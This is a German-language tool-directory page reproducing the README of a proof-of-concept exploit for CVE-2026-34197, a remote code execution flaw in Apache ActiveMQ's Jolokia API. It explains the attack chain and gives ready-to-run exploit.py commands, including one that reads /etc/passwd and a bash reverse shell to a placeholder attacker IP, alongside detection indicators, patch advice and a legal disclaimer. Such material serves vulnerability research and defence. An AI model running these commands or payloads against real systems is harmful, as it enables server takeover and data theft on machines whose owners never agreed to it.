Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/devsecurityspro/cve-2026-34197
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingLabs & Praxis
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

Proof-of-Concept-Exploit für CVE-2026-34197, eine RCE in Apache ActiveMQ über die Jolokia-API. Enthält einen Python-Exploit, eine Payload-Vorlage und ein Docker-Labor zum Testen und für Forschungszwecke.

Repository anzeigen
4vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-34197 — Apache ActiveMQ RCE über Jolokia-API

Beschreibung

CVE-2026-34197 ist eine Schwachstelle zur Remote-Code-Ausführung (RCE) in Apache ActiveMQ Classic, die es einem Angreifer ermöglicht, beliebige Befehle auf dem Betriebssystem des Servers über die in der Webkonsole exponierte Jolokia-API auszuführen.

Die Schwachstelle existiert seit mehr als 13 Jahren und liegt in der Interaktion zwischen mehreren Komponenten: Jolokia (HTTP-JMX-Brücke), den ActiveMQ-MBeans, den Netzwerk-Connectoren und dem VM-Transport.

Informationen zur Schwachstelle

FeldDetail
CVE-IDCVE-2026-34197
TypRCE (Remote Code Execution)
CWECWE-20 (Fehlerhafte Eingabevalidierung), CWE-94 (Code-Injection)
Betroffene VersionenActiveMQ Classic < 5.19.4, 6.0.0 — 6.2.2
Gepatchte Versionen5.19.4, 6.2.3
Authentifizierung erforderlichJa (Standard-Anmeldedaten admin:admin häufig)
Ohne Authentifizierung in6.0.0 — 6.1.1 (durch CVE-2024-32114)
Standard-Port8161 (Webkonsole)

Exploit-Mechanismus

Die Angriffskette funktioniert wie folgt:

  1. Der Angreifer sendet eine POST-Anfrage an /api/jolokia/ und ruft die Operation addNetworkConnector des Broker-MBeans auf.
  2. Das Argument enthält einen URI mit dem Transport vm://, der auf einen nicht existierenden Broker verweist.
  3. ActiveMQ versucht, diesen Broker spontan zu erstellen und akzeptiert den Parameter brokerConfig, der auf eine entfernte URL verweist.
  4. Das Schema xbean: zeigt an, dass die Ressource eine Spring-XML-Konfigurationsdatei ist.
  5. Spring instanziiert alle im XML definierten Beans, einschließlich eines, der Runtime.getRuntime().exec() ausführt.
  6. Der beliebige Befehl wird auf dem Server ausgeführt.
root@kitploit:~
Angreifer                          ActiveMQ (Opfer)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ANGREIFER/x.xml) |
   |                                    |
   |                                    |-- Erstellt VM-Broker
   |                                    |-- Lädt x.xml herunter
   |<-- GET /x.xml --------------------|
   |-- Antwortet mit XML-Payload ----->|
   |                                    |-- Spring instanziiert Beans
   |                                    |-- Runtime.exec(BEFEHL)
   |                                    |

Projektstruktur

root@kitploit:~
CVE-2026-34197/
├── README.md              # Diese Datei
├── exploit.py             # Haupt-PoC
├── payloads/
│   └── template.xml       # Vorlage für den Spring-XML-Payload
├── docker/
│   └── docker-compose.yml # Verwundbare Laborumgebung
└── LICENSE

Anforderungen

  • Python 3.8+
  • Module: requests, http.server, argparse (stdlib)
  • Netzwerkzugriff auf Port 8161 des Ziels
  • Docker und Docker Compose (optional, für das Labor)
root@kitploit:~
pip install requests

Verwendung

1. Verwundbare Umgebung starten (optional)

root@kitploit:~
cd docker
docker-compose up -d

Dies startet ein verwundbares ActiveMQ Classic 5.18.6 auf localhost:8161.

2. Exploit ausführen

root@kitploit:~
# Grundlegende Verwendung mit Standard-Anmeldedaten
python exploit.py -t http://ZIEL:8161 -l ANGREIFER_IP -c "id"

# Anmeldedaten angeben
python exploit.py -t http://ZIEL:8161 -l ANGREIFER_IP -c "whoami" -u admin -p admin

# Port des lokalen HTTP-Servers für den Payload angeben
python exploit.py -t http://ZIEL:8161 -l ANGREIFER_IP -lp 9999 -c "cat /etc/passwd"

# Modus ohne Authentifizierung (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://ZIEL:8161 -l ANGREIFER_IP -c "id" --no-auth

# Reverse Shell
python exploit.py -t http://ZIEL:8161 -l ANGREIFER_IP -c "bash -i >& /dev/tcp/ANGREIFER_IP/4444 0>&1"

Parameter

ParameterBeschreibung
-t, --targetBasis-URL des Ziels (z. B. http://10.0.0.1:8161)
-l, --lhostIP des Angreifers zum Ausliefern des XML-Payloads
-lp, --lportPort des lokalen HTTP-Servers (Standard: 8888)
-c, --commandAuf dem Ziel auszuführender Befehl
-u, --userBenutzer (Standard: admin)
-p, --passwordPasswort (Standard: admin)
--no-authKeine Anmeldedaten senden (für Versionen 6.0.0 - 6.1.1)
--broker-nameName des Brokers (Standard: localhost)

Erkennung

Indikatoren in den Logs des ActiveMQ-Brokers:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

Weitere Indikatoren:

  • POST-Anfragen an /api/jolokia/ mit addNetworkConnector im Body
  • Ausgehende HTTP-Verbindungen vom ActiveMQ-Prozess zu unerwarteten Hosts
  • Unerwartete Kindprozesse, die vom Java-Prozess von ActiveMQ erzeugt werden

Behebung

  • Aktualisierung auf ActiveMQ Classic 5.19.4 oder 6.2.3
  • Ändern der Standard-Anmeldedaten der Webkonsole
  • Einschränken des Netzwerkzugriffs auf Port 8161
  • Überwachen der Broker-Logs auf vm://-URIs mit brokerConfig=xbean:http

Referenzen

  • NVD — CVE-2026-34197
  • Horizon3 — Technische Analyse
  • Apache ActiveMQ — Sicherheitshinweis
  • CVE-2024-32114 — Jolokia ohne Authentifizierung
  • CVE-2023-46604 — RCE OpenWire (CISA KEV)

Autor

Erstellt von KONDOR DEV SECURITY

Telegram

Rechtlicher Hinweis

Dieser PoC wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Die Verwendung dieses Tools gegen Systeme ohne ausdrückliche Genehmigung ist illegal. Der Autor übernimmt keine Verantwortung für die missbräuchliche Verwendung dieses Tools.

Lizenz

MIT — Copyright (c) 2026 KONDOR DEV SECURITY

Tool herunterladen